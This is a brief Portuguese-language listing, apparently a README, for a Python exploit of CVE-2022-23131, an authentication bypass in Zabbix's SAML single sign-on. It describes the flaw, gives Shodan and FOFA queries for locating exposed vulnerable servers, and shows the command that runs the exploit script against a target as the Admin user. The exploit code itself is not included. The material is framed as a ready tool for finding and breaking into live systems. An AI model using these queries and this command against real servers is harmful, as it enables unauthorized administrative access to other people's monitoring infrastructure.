
Exploit em Python para CVE-2022-23131 visando bypass de autenticação SAML SSO do Zabbix. Inclui dorks do Shodan e FOFA para descoberta de instâncias vulneráveis.
Zabbix - Bypass de Autenticação SAML SSO
Em instâncias onde a autenticação SAML SSO está habilitada (não padrão), os dados da sessão podem ser modificados por um ator malicioso, porque um login de usuário armazenado na sessão não foi verificado.
shodan-query: http.favicon.hash:892542951
fofa-query: app="ZABBIX-监控系统" && body="saml"
python3 zabbix_session_exp.py -t https:target.com -u Admin